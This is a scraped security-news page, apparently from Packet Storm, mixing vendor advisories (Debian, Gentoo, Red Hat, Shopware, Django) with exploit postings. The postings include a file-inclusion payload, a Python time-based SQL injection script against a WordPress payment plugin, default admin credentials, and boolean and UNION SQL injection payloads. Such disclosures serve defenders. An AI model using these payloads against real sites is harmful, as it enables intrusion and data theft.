Debian Linux Security Advisory 5746-1 - Noah Misch discovered a race condition in the pg_dump tool included in PostgreSQL, which may result in privilege escalation.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5746-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 09, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-13CVE ID         : CVE-2024-7348Noah Misch discovered a race condition in the pg_dump tool included inPostgreSQL, which may result in privilege escalation.For the oldstable distribution (bullseye), this problem has been fixedin version 13.16-0+deb11u1.We recommend that you upgrade your postgresql-13 packages.For the detailed security status of postgresql-13 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-13Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma11EEACgkQEMKTtsN8TjZxwg//bEVYrijo3AoQCcZMdHcgEPvJPYNUvCAsoX9NBiLzSPs0A8zW6OVmo3uCX+vY/YziF6z7CFU0BkFMDUGnbDnmAuMT2ZY7K2kqyUas3EwEsf3WScPDtRbo5V5ScXWUz+uuuAzibJWSZUr/MqjCojb5KwWoVKF5cw6e9glQNMgi0txLi+7xWK0Hkhye39Dm/RE9Brd6tyvSx5mm/sAuPv3H6ZktnIrWOrdZlglsiPURjUsY7ThYBrjbc/lLR3zNEYxHEvFf3MaXbud98wPou8tLl5qMSIZDYuc+IvYVCgCVUeiDUuPng5i23f4da0BoDRvzKk/7+20g3Z7pZm3kJJk+TYifELXEM2SFkLv/2rD4YVuqhMOkmsqYQXgLgvJ+XxkSzgnNBB7cML1F4+hq9zGtHyJgNiiaOfFFoL583WbHl7oRLAg+y0SCnXlCewft4KrIBhEe1zOJIuGQ/WL611/5dGy5tqkvivIoVbvcYZxmoVE5kllZEFjSsmfADfbn+HtA0lOHDwfyuBnvWOqzDgTd2BCdGIaF2+/FtUpqJDmjH6TnujtqDh6MmsbOaF/qw9XuI3jzORNjrLdFoJwya9N79vTYTgCFJEWl3oGygVkTG2RRhsqY6kNgQ6pykcfcw+m0uZFoT6SRNBllFhyrRTdvcm6GB5yXwVJKwERgRVlJWCM=wYjH-----END PGP SIGNATURE-----

Debian Security Advisory 5746-1

Debian Linux Security Advisory 5745-1 - Noah Misch discovered a race condition in the pg_dump tool included in PostgreSQL, which may result in privilege escalation.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5745-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 09, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-15CVE ID         : CVE-2024-7348Noah Misch discovered a race condition in the pg_dump tool included inPostgreSQL, which may result in privilege escalation.For the stable distribution (bookworm), this problem has been fixed inversion 15.8-0+deb12u1.We recommend that you upgrade your postgresql-15 packages.For the detailed security status of postgresql-15 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-15Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma11EAACgkQEMKTtsN8TjaqZRAAtSdRKaKkHTz14XjjqH3d4lBvZpkZB5p5phqeR2KM2+ZpA++YalAcrnRiAmhHEb0uoCV4R8zQxGw23zpjWKyR3uvW2RMyK1S62eOvZ7u+ia7iffNhmHzzQWdVYcjCbJSMw2gpNo71houCZ5064Z86AFLpzd/HY0rlTnlF73gpXGndOnN8nRNagimLQ0N3kY5yt7HNDKnOkZtsZkHoyQ52eCobXuXTJ3b/QgbzAMR6tWdp7P6Vlf1d0H0JA3npdCYDh4cY+TyGVXYiR1KjU7qtYDLf5cWbUC1ie8iE811Y0nNSP22zd/0zH2WVJDbMFxsej1WE1fSLa/ksr+22KHwjpQwz76hcHEUZbrBdP/2qAs6CV203mpqZD0GrYI6wASQbXQEPgzVLFhnHYISnNTv/ggX+w/shcB6qp1y1gs4FEYIf9D3btKZutiNDkSBh4v43GBI0j7nOMd/Je2Dvg4JzFZ5k57SaMYfS7Qkic3/h2h2VYXK0KiaNoGQsnrCGAW6GU+Owccr02UYgBYPedK9ZU9ZXIgUfrRG0087vxm0hfrpmQd4+yb3Yc60uRCV1YD/NEeQTD538T/UjdBXhnHIPdFK6hHasbuRbB7+ZwSAEV9aaY04kif27ANz79aVAGdFoVYNS9o0bkCWJ0+IH3J6iLTBj7Oe3hv6cXunj/X8rGyM==nOfc-----END PGP SIGNATURE-----

Debian Security Advisory 5745-1

Gentoo Linux Security Advisory 202408-15 - Multiple vulnerabilities have been discovered in Percona XtraBackup, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 8.0.29.22 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Percona XtraBackup: Multiple Vulnerabilities  
     Date: August 09, 2024  
     Bugs: #849389, #908033  
       ID: 202408-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Percona XtraBackup, the  
worst of which could lead to arbitrary code execution.

Background  
==========

Percona XtraBackup is a complete and open source online backup solution  
for all versions of MySQL.

Affected packages  
=================

Package                        Vulnerable    Unaffected  
-----------------------------  ------------  ------------  
dev-db/percona-xtrabackup      < 8.0.29.22   >= 8.0.29.22  
dev-db/percona-xtrabackup-bin  < 8.0.29.22   Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in Percona XtraBackup.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Percona XtraBackup users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-db/percona-xtrabackup-8.0.29.22"

Gentoo has discontinued support for the binary package. Users should  
remove this from their system:

  # emerge --sync  
  # emerge --ask --verbose --depclean "dev-db/percona-xtrabackup-bin"

References  
==========

[ 1 ] CVE-2022-25834  
      https://nvd.nist.gov/vuln/detail/CVE-2022-25834  
[ 2 ] CVE-2022-26944  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26944

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-15

Farmacia Gama version 1.0 suffers from a file inclusion vulnerability.

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 File inclusion Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?id=1&pg=[+] http://127.0.0.1/farmacia-master/main.php?id=1&pg=http://127.0.0.1/phpMyAdmin/themes/pmahomme/img/logo_left.pngGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Farmacia Gama 1.0 File Inclusion 

### Impact

The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the “aggregations”
object. The ‘name’ field in this “aggregations” object is vulnerable SQL-injection and can be exploited using SQL parameters.

### Patches

Update to Shopware 6.6.5.1 or 6.5.8.13

### Workarounds

For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.

### Credit

[LogicalTrust](https://logicaltrust.net)

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-42357

**Shopware vulnerable to blind SQL-injection in DAL aggregations**

High severity GitHub Reviewed Published Aug 8, 2024 in shopware/shopware • Updated Aug 8, 2024

**Package**

composer shopware/core (Composer)

**Affected versions**

<= 6.5.8.12

\>= 6.6.0.0, <= 6.6.5.0

**Patched versions**

6.5.8.13

6.6.5.1

<= 6.5.8.12

\>= 6.6.0.0, <= 6.6.5.0

**Impact**

The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the “aggregations”  
object. The ‘name’ field in this “aggregations” object is vulnerable SQL-injection and can be exploited using SQL parameters.

**Patches**

Update to Shopware 6.6.5.1 or 6.5.8.13

**Workarounds**

For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.

**Credit**

LogicalTrust

**References**

*   GHSA-p6w9-r443-r752
*   shopware/core@63c0561
*   shopware/core@a784aa1
*   shopware/shopware@57ea2f3
*   shopware/shopware@8504ba7

Published to the GitHub Advisory Database

Aug 8, 2024

GHSA-p6w9-r443-r752: Shopware vulnerable to blind SQL-injection in DAL aggregations

An issue was discovered in Django 5.0 before 5.0.8 and 4.2 before 4.2.15. QuerySet.values() and values_list() methods on models with a JSONField are subject to SQL injection in column aliases via a crafted JSON object key as a passed *arg.

**Django SQL injection vulnerability**

Critical severity GitHub Reviewed Published Aug 7, 2024 to the GitHub Advisory Database • Updated Aug 7, 2024

GHSA-pv4p-cwwg-4rph: Django SQL injection vulnerability

WordPress PayPlus Payment Gateway plugin versions prior to 6.6.9 suffer from a remote SQL injection vulnerability.

    #!/usr/bin/env python3.11import requestsimport timedef exploit(url):    payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}    start = time.time()    with requests.Session() as session:        session.headers.update({            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        })        response = requests.get(url, params=payload)        print(f"Exploiting {url}...")        end = time.time()        print(response.status_code)        response_time = end - start        print(f"Response time: {response_time}...")if __name__ == "__main__":    url = input("Enter the vulnerable URL (e.g., https://test.site): ")    if not url.startswith("http"):        url = "http://" + url    exploit(url)

WordPress PayPlus Payment Gateway SQL Injection

Red Hat Security Advisory 2024-5056-03 - Red Hat Integration Camel K 1.10.7 release and security update is now available.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5056.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Integration Camel K 1.10.7 release and security update.Advisory ID:        RHSA-2024:5056-03Product:            Red Hat IntegrationAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5056Issue date:         2024-08-06Revision:           03CVE Names:          CVE-2024-1597====================================================================Summary: Red Hat Integration Camel K 1.10.7 release and security update is now available.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Camel K 1.10.7 is now available.The purpose of this text-only errata is to inform you about the security issues fixed.Security Fix(es):* pgjdbc: PostgreSQL JDBC Driver allows attacker to inject SQL if using PreferQueryMode=SIMPLE (CVE-2024-1597)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE important page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1597References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2266523

Red Hat Security Advisory 2024-5056-03

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

Posted Aug 7, 2024

Authored by indoushka

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 8c38f4e680e6513d62d4303a51a4d7e3eaa5a7bb80e3e87ce8e510bba268a0b9

Download | Favorite | View

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Covid-19 Directory on Vaccination System v1.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,289)
*   Arbitrary (16,852)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,792)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,386)
*   DoS (25,050)
*   Encryption (2,389)
*   Exploit (53,137)
*   File Inclusion (4,259)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,889)
*   Intrusion Detection (915)
*   Java (3,143)
*   JavaScript (896)
*   Kernel (7,191)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,167)
*   Perl (1,435)
*   PHP (5,222)
*   Proof of Concept (2,382)
*   Protocol (3,724)
*   Python (1,635)
*   Remote (31,646)
*   Root (3,635)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,605)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,941)
*   Web (9,960)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,090)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,547)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,646)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,459)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,729)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,670)
*   Other

Covid-19 Directory On Vaccination System 1.0 Insecure Settings

eduAuthorities version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: eduAuthorities-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 07/29/2024## Vendor: https://www.mayurik.com/## Software:https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The editid parameter appears to be vulnerable to SQL injection attacks. Thepayloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were eachsubmitted in the editid parameter. These two requests resulted in differentresponses, indicating that the input is being incorporated into a SQL queryin an unsafe way. Note that automated difference-based tests for SQLinjection flaws can often be unreliable and are prone to false positiveresults. You should manually review the reported requests and responses toconfirm whether a vulnerability is actually present.Additionally, the payload (select*from(select(sleep(20)))a) was submittedin the editid parameter. The application took 20011 milliseconds to respondto the request, compared with 3 milliseconds for the original request,indicating that the injected SQL command caused a time delay.The attackercan get all information from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: #1* (URI)    Type: boolean-based blind    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#UiVZfrom(select(sleep(3)))a)    Type: UNION query    Title: MySQL UNION query (random number) - 3 columns    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962UNION ALL SELECT8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)---```## Reproduce:[href](https://www.patreon.com/posts/eduauthorities-1-109562178)## More:[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)## Time spent:00:37:00

Tag

#sql